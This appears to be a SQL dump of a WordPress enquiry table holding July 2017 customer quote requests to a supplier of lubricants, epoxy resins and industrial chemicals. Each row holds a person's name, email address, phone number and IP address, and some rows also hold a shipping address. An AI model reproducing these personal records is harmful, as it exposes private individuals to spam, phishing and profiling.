INSERT INTO `wp_enquiry_detail_new` VALUES (1239, 'Chris Weishaar', 'Chris.weishaar@navy.mil', 'We would like to get a quote for some:\nKrytox 240AC\n(4) 8 oz. tube\n\nIf you could make this to:\nNUWC Keyport\n610 Dowell Street\nKeyport, WA 98345\n\nWe would appreciate it, and if there is any other information you can give in regards to sizes and pricing that would be helpful as well.\n\nThank you very much.\n\nRespectfully,\nChris', '', 'Quote Request', '138.163.106.71', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-17 17:25:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1240, 'NADIR ZAIDI', 'szaidi@sem-inc.com', 'Please send me RFQ for connector lubricant\nms-381h. RFQ for 12 PCS', '408263-3600', 'RFQ', '67.203.147.83', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1670";s:5:"title";s:7:"MS-381H";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/shutterstock_511113739.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-17 17:37:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1241, 'JUANITA FRITSMA', 'JFRITSMA@MCATI.COM', 'Only need 1 can to test ', '321608-4177', 'QUOTE', '207.201.209.124', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"735";s:5:"title";s:37:"MS-470C | Urethane Conformal Coatings";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-17 18:34:40', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1242, 'Peter Guillen', 'peter.guillen@xilinx.com', 'request for price quotation and wanted to verify epoxy stripping agent MS-111 can remove device under fill ', '408879-6952', 'Price Quoation', '149.199.62.254', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:30:"MS-111 | Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-17 23:10:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1243, 'Kirby McCoy', 'gotya9@gmail.com', 'Hey guys, I do a lot of industrial construction and maintenance and work under a lot of heat and have used this product many times on safety glasses, welding lenses and whatnot and I would like to know how I could start placing orders so I can keep using it because it works better than any product I\'ve used.  Could I make an account with you guys and just message you when I need an order and go from there? ', '336592-5051', 'Plastic Cleaner', '66.191.162.89', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"3";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-18 08:34:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1244, 'Caroline', 'caellis@accutome.com', 'Please let me know how much these cost. And if so how to go about ordering them\n', '484329-2283', '', '173.167.215.155', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-18 13:49:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1245, 'Lynn Kasza', 'Kaszal@zin-tech.com', 'Please quote price and lead time for MS-907 QTY ONE.\nZin requires Certificate of conformance, Batch, Lot, S/N with shipment - can you provide ?', '', 'quote', '96.27.108.162', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-18 14:03:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1246, 'Moises Torres', 'moitorre04@gmail.com', 'Need a case .', '206420-9869', '', '97.113.190.235', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-18 17:18:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1247, 'Margaret', 'margaret.house@student.nmt.edu', 'Hello, what is the price of 1 gallon of EPON 828 resin, do you have it in stock, and when would I receive it? Additionally, are you able to be a vendor for a lab?', '', '1 gallon EPON 828 Resin', '129.138.128.213', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-18 17:28:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1248, 'jim nelson', 'jnelson1@mmm.com', 'need QUATE AND AVAILABILITY asap FOR 5 GALLON EPON 1031. ', '612730-8136', 'EPON 1031 quote for 5 gallon pail', '108.171.131.180', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"948";s:5:"title";s:12:"EPON™ 1031";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-1031.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-18 20:53:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1249, 'Hiroyuki Fukushima', 'fukushima@xgsciences.com', 'To whom it may concern,\n\nI would like to order 1 gal x 2 = 2 gal of Epon 828 resin. I appreciate if you can send me a quote.\n\nRegards,\n\nHiroyuki Fukushima\nTechnical Director\nXG Sciences', '517999-4570', 'Quote ', '216.163.53.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-18 21:38:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1250, 'Peter Asenbaum', 'asenbaum@stanford.edu', 'Quote for 10 AeroDuster MS-222N', '650724-7815', '', '171.64.58.20', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:2:"10";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-18 23:15:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1251, 'Ann Wilson', 'barbara.wilson.5@us.af.mil', 'Need quote for 1 quart size bottle.\n\nThanks!', '405582-4532', 'MS-472C', '132.26.121.33', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"736";s:5:"title";s:7:"MS-472C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-472C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-19 11:53:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1252, 'michelle keenan', 'michelle.keenan@kaman.com', 'Please advise price &amp; lead', '', 'Price &amp; Avail', '199.116.175.56', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"6";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-19 14:24:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1253, ' Joseph', 'microminimfg@zoominternet.net', 'Can you please send us a quote for 12 of MS-580 Precision Cleaning Solvent', '', 'quote for MS-580', '24.154.51.132', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1705";s:5:"title";s:12:"MS-580N/582N";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-580N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-19 14:58:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1254, 'Alessandro', 'baldaa@clarkson.edu', 'Hello,\nI am a PhD student in Clarkson University and I would be interested in purchasing the "two-part adhesive" for my experiments and I would like to know the cost for one item and the shipping ', '', '', '128.153.12.44', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-19 15:20:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1255, 'Ethan Verebelyi', 'evverebelyi@gmail.com', 'What sizes is this product available in? also what is the pricing on Epikure W?', '', 'Sizes Availavble', '192.17.52.126', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-19 15:58:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1256, 'gabriela cabanillas', 'gcabanillas@hermestechnical.com', 'please quote 1 qt, lead time to miami 33166, florida\nThanks', '305477-8993', '', '190.117.143.40', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1183";s:5:"title";s:15:"EPIKURE™ 3223";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3223.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-19 16:20:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1257, 'John Hood', 'john.w.hood@nasa.gov', 'Could I get the SDS for this product?', '256544-9587', 'SDS', '138.115.42.228', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2763";s:5:"title";s:9:"MS-122ADL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_318864752.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-19 18:41:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1258, 'David Wilbur', 'dwilbur@wilburproducts.com', 'We cast rigid urethane parts, hardness range is 70 - 80 shore D.  Our molds are steel and or Acetal (Delrin)', '616850-9868', 'Sample', '24.236.157.122', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"310";s:5:"title";s:46:"ReleaSys™ 8900 | Urethane Mold Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_523637050.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-19 20:51:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1259, 'Christopher Bowland', 'bowlandcc@ornl.gov', 'I am interested in purchasing 2 1-gallon bottles of Epon 862. I am needing a price quote and a part number to process the order through my purchasing department.', '865574-6622', 'Epon 862 Quote Request', '160.91.56.199', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-19 21:37:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1260, 'sourav chakravarty', 'sourav93@tamu.edu', 'Hi, I am a graduate mechanical student at Texas A&amp;M University. Me and my advisor were curious to know about the mechanical characteristic , along with the drying time for Epon 862 your company manufactures. Also , if possible we would like to get a sample of the same.', '979985-8459', 'Epon 862 required for research', '165.91.188.77', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-20 00:54:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1261, 'Denise Hauert', 'dhauert@smartproducts.com', 'Please quote your GPL 105 in the 1kg size.\nprice of 1 ea and your minimum order.\nThank you\nDenise Hauert\nSmart Products USA\nMills River, NC', '828595-8107', 'PRICE QUOTE PLEASE', '165.166.238.218', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"440";s:5:"title";s:7:"GPL 105";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease5.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-20 13:15:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1262, 'Cindy Kaleta', 'ckaleta@americochemical.com', 'Hello,\n\nI am looking to get a quote on Vydax NRT 960.  Is that something you can send me?\n\nThanks,\n\nCindy', '630857-8939', 'Vydax', '50.196.199.9', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1683";s:5:"title";s:16:"Vydax™ NRT 960";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:95:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-vydax-dryfilm-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-20 18:32:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1263, 'Michelle Montoya', 'michelle.montoya@uc.edu', 'Good Afternoon, I would like to order the Krytox 157FSL Oil 2oz. I would like to pay using a VISA, please contact me at 513-556-0088 for details. The shipping address is: University of Cincinnati, 2901 Woodside Dr. Room 601 ERC, attn Zhe Zhang, Cincinnati, OH 45221. Thanks!', '513556-0088', 'Krytox 157FSL Oil 2oz', '129.137.96.8', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-20 20:31:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1264, 'Jeremy Stark', 'jstark@magcanica.com', 'Hello:\n\nI would like to request a quote for MS-555 flux remover in quantity of 10, 50 and 100.\n\nThanks,\n\nJeremy Stark', '617870-4567', 'Requesting quote for MS-555 flux remover', '67.52.152.98', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-20 22:43:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1265, 'Nicolas Brown', 'nicolas@beltscan.com', 'Hi,\nDo you have any of the GPL102 or GPL-103 Krytox oil in stock? We are after multiple kgs and to be shipped as soon as possible to Australia.\n\nRegards,\nNic', '+61431863893', 'In stock', '120.154.52.83', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"437";s:5:"title";s:7:"GPL 102";s:5:"price";s:0:"";s:5:"quant";s:1:"5";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-21 05:08:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1266, 'travis', 'travisianhatfield@gmail.com', 'wanting to know price, ship time, etc to ERI in Chandler IN.', '765721-1633', '', '74.87.219.43', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"732";s:5:"title";s:7:"MS-462H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-462H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-21 14:22:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1267, 'travis', 'travisianhatfield@gmail.com', 'need this and silicone formal coatings. wanting to know ship time. price . volumes avail. \n\nto ERI in chandler IN.', '765721-1633', 'price . cc etc', '74.87.219.43', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"734";s:5:"title";s:7:"MS-467C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-467C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-21 14:24:50', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1268, 'Nathan Carlie', 'ncarlie@edmundoptics.com', 'We are looking for a low-outgassing lubricant and sealant for aluminum threads. ', '856547-3488', 'TS4', '63.116.248.37', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"989";s:5:"title";s:3:"TS4";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-ts4-thread-sealant-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-21 16:25:40', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1269, 'Sabrina Torres', 'storres@kcp.com', 'Hello, our production area uses a variety of silicones and urethanes placed into compression molds.  We would like to sample this material to see if the MS-122XD works better than the current mold release for current and future work.', '816488-7529', 'Process Testing', '199.89.130.51', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1681";s:5:"title";s:8:"MS-122XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122xd-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-21 18:39:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1270, 'Nathan Banker', 'nathan.banker@dloiltools.com', 'We are looking at molding AFLAS in our rubber division, but we are having trouble with the rubber trying to stick to our compression molds.  We made an inquiry to WABTEC and they recommended we try using MS-145W mold release manufactured by you.  Would it be possible to get a small sample to use on a trial run?  Or what is the smallest amount that we can purchase for a trial run?\n\nBest,\n\nNathan Banker\nMaterials Engineer, D&amp;L Oil Tools', '918933-4317', '', '174.79.212.226', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2312";s:5:"title";s:41:"MS-145W | Water-based Mold Release Agents";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_72669607.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-21 18:59:51', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1271, 'Tom Christopherson', 'tchristo46@comcst.net', 'What is the cost per can, per box?  What is the standard packaging?  Is there a minimum purchase quantity for spray cans?', '', '', '24.23.181.106', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"733";s:5:"title";s:35:"MS-465C | Acrylic Conformal Coating";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-465C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-22 21:09:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1272, 'JOSE FELIX MARTELINO', 'martelino@almadion.com', 'URGENT:\nPlease quote exworks West coast pricing 2 boxes x 12 cans', '+971508945595', 'MS-720', '86.98.29.183', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1713";s:5:"title";s:10:"MS-280/282";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-280.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-23 10:21:40', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1273, 'JOSE FELIX MARTELINO', 'martelino@almadion.com', 'PLEASE QUOTE FOR 48 CANS FOB WEST COAST.', '', 'MS-720', '86.98.29.183', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1706";s:5:"title";s:10:"MS-720/722";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-720.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-23 10:57:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1274, 'Roman Aerne', 'roman.aerne@execujet.com.au', 'Price inquiry. \n', '+61438772737', 'MS-260 spray', '180.148.79.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:2:"24";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-24 01:18:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1275, 'debbie byers', 'debra.byers@itt.com', 'please provide pricing for case of 12', '714628-2204', 'ms-122ad', '40.128.143.67', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-24 13:50:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1276, 'Javier Zapata', 'JZapata@Av-inflatables.com', 'Good day , \n Can you please provide a price quote on the available sizes of Krytox 640AZ Grease . Thank you ', '', 'price quote on Krytox 640 AZ  grease', '96.85.163.225', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"638";s:5:"title";s:5:"240AZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_300460277.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-24 20:10:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1277, 'Tyler Fannon', 'tjfannon@gmail.com', 'I am a QA person for a company. I would like better products. Thanks', '319538-6963', 'Flux remover', '173.28.128.14', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-25 03:03:44', '', NULL, '', '', '', NULL, '', ''); 
